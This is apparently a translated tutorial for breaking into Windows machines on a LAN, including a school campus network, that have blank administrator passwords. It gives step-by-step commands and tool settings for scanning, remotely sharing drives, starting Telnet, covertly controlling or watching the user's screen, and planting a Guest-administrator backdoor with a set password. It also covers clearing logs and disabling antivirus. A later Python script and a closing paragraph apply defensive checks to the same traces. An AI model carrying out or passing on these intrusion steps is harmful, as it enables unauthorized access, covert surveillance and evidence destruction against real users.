Intrusion conditions:
1. The intrusion scope only covers the LAN. If you are at a school, you can intrude into the entire campus network.
2. The target host has a weak password (username administrator, blank password), port 139 is open, and no host firewall is enabled.
Intrusion tool:
Generally, you need three tools: the NTscan abnormal scanner, Recton (D Special Edition), and DameWare Mini Remote Control 4.5 (Chinese version). Anti-virus software flags the first two as malware; we recommend temporarily disabling real-time anti-virus protection and keeping the two tools in password-protected archives so they are not quarantined.
Intrusion steps:
1. Run the NTscan abnormal scanner, fill in the IP address range to scan, select the "WMI scan" method, press "Start" and wait for the scan results (the hosts it lists are those that accepted the administrator account with a blank password).
2. Use "Recton -- D Special Edition".
Select "CMD command" and enter "net share C$=C:" in "CMD:" to share the remote host's C drive; replace C with D, E, F and so on to share the D, E and F drives. This kind of share is well concealed and exposes the whole drive: no shared-folder icon appears on the target host. Then enter "\\IP\C$" in the Explorer address bar to open the target host's C drive. (Check: "net share C$=C:" fails with "The name has already been shared" (NET HELPMSG 2118) on hosts where the default C$ administrative share still exists; in that case the existing C$ is already usable.)
Select "Telnet" and enter the IP address you just scanned in "remote host" to start the Telnet service remotely. Then, under "CMD options", run "net share IPC$", then "net share ADMIN$", and finally "net use \\***.***.***.***\IPC$ "" /user:administrator", filling in the IP address of the host you are attacking.
3. Use DameWare Mini Remote Control 4.5 (Chinese version). After installation, open "DameWare Mini Remote Control", choose "Activate product" under "Help" and enter the registration information. After registering, open the "Remote Connect" window, enter the IP address in "Host", click "Settings", then click "Edit" under "Service installation options"; in the "Notification dialog" tab untick "Connection notification", in "Additional settings" untick everything, and in "User options" untick "Enable user options". When done, click "Connect" and click "OK" in the dialog that appears. You can then operate the other computer as if it were your own, or simply watch the other user's screen. Note: if the product is not registered, a dialog box pops up on the remote host and gives you away.
Additions to the intrusion steps:
1. Instead of starting the Telnet service remotely from Recton in the Telnet step above, you can right-click "My Computer" - "Manage" - "Connect to another computer", enter the IP, then go to "Services and Applications" - "Services", set Telnet to "Manual" and start it.
2. Recton-D has other functions. Under "Process" you can view the remote host's processes and kill any of them. Under "Share" you can create shares; I usually create C$, D$, E$ and F$ with share paths C:, D:, and so on. After sharing, enter \\IP\C$ in the address bar to open the other party's C drive, where you can copy and delete content at will; no share icon appears on the other party's drive letter, so it is not noticed. It is best to remove the shares when you are done. Finally, choose "Log" to clear all the logs so no trace is left. (Caveat: clearing the Security log itself writes an "audit log was cleared" event, ID 517 on Windows 2000/XP and 1102 on Vista and later, so the wipe is visible to anyone reviewing the log, and it does nothing about events already forwarded to a central collector.) This software is detected as a virus by anti-virus products; disable real-time protection while using it.
3. The sharing above can also be done from CMD (Programs - Accessories - Command Prompt). First run "telnet IP"; once the Telnet session is up, type y, then enter the user name "administrator" with a blank password. Once in, open shares with the net share command: share C$ (that is, drive C) with "net share C$=C:", share the system folder with "net share c=C:\winnt\system32", share IPC$ with "net share IPC$", and so on. Finally remove the shares, for example drive C: "net share C$ /del".
4. To make the next intrusion easier, you can leave a backdoor. List the users with "net user", then activate the Guest account: "net user guest /active:yes", set Guest's password to poco: "net user guest poco", and raise Guest to administrator: "net localgroup administrators guest /add".
5. There are many Telnet (DOS) commands; you can look them up online. Commonly used ones: list the files on drive D: "dir d:"; list the C drive's Program Files folder: "dir c:\PROGRA~1"; shut down after a 60-second countdown: "shutdown -s -t 60".
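Seen from the other side, steps 2 to 4 above leave concrete traces on the victim: drive-root and system32 shares that Windows did not create, and a Guest account that is enabled and sits in Administrators. The following script is an added example (not part of the original tutorial or of any of the tools it names) that checks for exactly those traces offline, by parsing captured output of "net share", "net user guest" and "net localgroup administrators". The sample outputs are constructed to mimic an English-locale Windows XP host after those steps; the parser assumes that English column layout.

```python
import re

# Remarks Windows itself prints for the shares it creates (as shown by `net share`).
DEFAULT_REMARKS = {"Default share", "Remote IPC", "Remote Admin"}
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")
SYSTEM_DIR = re.compile(r"^[A-Za-z]:\\(winnt|windows)(\\system32)?\\?$", re.IGNORECASE)
PATH_LIKE = re.compile(r"^([A-Za-z]:|\\\\)")


def _table_rows(text):
    """Rows between the dashed separator and the 'The command completed' line,
    the table layout shared by `net share`, `net user` and `net localgroup`."""
    rows, in_table = [], False
    for line in text.splitlines():
        if line.startswith("----"):
            in_table = True
            continue
        if line.startswith("The command completed"):
            break
        if in_table and line.strip():
            rows.append(line.strip())
    return rows


def parse_net_share(text):
    """{share_name: (path, remark)} from `net share` output. Columns are split on
    runs of two or more spaces, so share names containing spaces are not handled."""
    shares = {}
    for row in _table_rows(text):
        fields = re.split(r"\s{2,}", row)
        path = remark = ""
        for field in fields[1:]:
            if PATH_LIKE.match(field):
                path = field
            else:
                remark = field
        shares[fields[0]] = (path, remark)
    return shares


def suspicious_shares(shares):
    """Shares matching what the walkthrough creates: a drive root or the system
    directory exposed under a name Windows did not create itself, or any hidden
    ($) share without a Windows remark (print$ and the like get listed for review)."""
    hits = []
    for name, (path, remark) in shares.items():
        if remark in DEFAULT_REMARKS:
            continue
        if DRIVE_ROOT.match(path) or SYSTEM_DIR.match(path) or name.endswith("$"):
            hits.append(name)
    return sorted(hits)


def guest_account_active(text):
    """True if `net user guest` reports the account as active."""
    m = re.search(r"^Account active\s+(\S+)", text, re.MULTILINE)
    return m is not None and m.group(1).lower() == "yes"


def localgroup_members(text):
    """Member names listed by `net localgroup <group>`."""
    members = []
    for row in _table_rows(text):
        members.extend(re.split(r"\s{2,}", row))
    return members


def audit(net_share_out, net_user_guest_out, net_localgroup_admins_out):
    """Human-readable findings for the three captured command outputs."""
    findings = []
    for name in suspicious_shares(parse_net_share(net_share_out)):
        findings.append(f"share {name!r} exposes a drive root or system directory and was not created by Windows")
    if guest_account_active(net_user_guest_out):
        findings.append("Guest account is enabled")
    if "guest" in (m.lower() for m in localgroup_members(net_localgroup_admins_out)):
        findings.append("Guest is a member of the local Administrators group")
    return findings


# Constructed sample output (not captured from a real host): a machine after
# steps 2-4 above, with extra shares c and E$, Guest enabled and in Administrators.
SAMPLE_NET_SHARE = """\
Share name   Resource                        Remark

-------------------------------------------------------------------------------
ADMIN$       C:\\WINNT                        Remote Admin
C$           C:\\                             Default share
IPC$                                         Remote IPC
c            C:\\WINNT\\system32
E$           E:\\
The command completed successfully.
"""
SAMPLE_NET_USER_GUEST = """\
User name                    Guest
Comment                      Built-in account for guest access to the computer/domain
Account active               Yes
Account expires              Never
The command completed successfully.
"""
SAMPLE_NET_LOCALGROUP_ADMINS = """\
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Guest
The command completed successfully.
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_NET_SHARE, SAMPLE_NET_USER_GUEST, SAMPLE_NET_LOCALGROUP_ADMINS):
        print("FINDING:", finding)
```

On a real host, feed it the output of the three commands saved with "net share > shares.txt" and so on; a share named C$ that carries no "Default share" remark is the tell-tale of a manually recreated one, and the only legitimate reason for Guest to be active and in Administrators is none.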
Note:
1. Causes of net use errors:
(1) "System error 1326 has occurred. Logon failure: unknown user name or bad password."
On the remote machine, open "Control Panel - Folder Options - View", untick "Use simple file sharing", then try to connect again. Simple file sharing treats every network logon as a Guest logon, which cannot access administrative shares such as C$.
(2) "System error 1327 has occurred. Logon failure: user account restriction. Possible reasons are blank passwords not being allowed, logon hour restrictions, or a policy restriction has been enforced." On the remote machine, in "Control Panel - Administrative Tools - Local Security Policy - Security Options", disable "Accounts: Limit local account use of blank passwords to console logon only".
(3) The system reports that the network path "\\IP\C$" cannot be found. In "Network and Dial-up Connections", open "Local Area Connection", select "Internet Protocol (TCP/IP)", go to "Advanced TCP/IP Settings", then the "WINS" tab, and select "Enable NetBIOS over TCP/IP".
Note that all three are settings on the target itself, so they can only be changed once you already have access to it. From the defender's side, these are exactly the controls that stop this attack: keep simple file sharing and the blank-password restriction at their defaults, disable NetBIOS over TCP/IP where it is not needed, and, above all, give the administrator account a real password.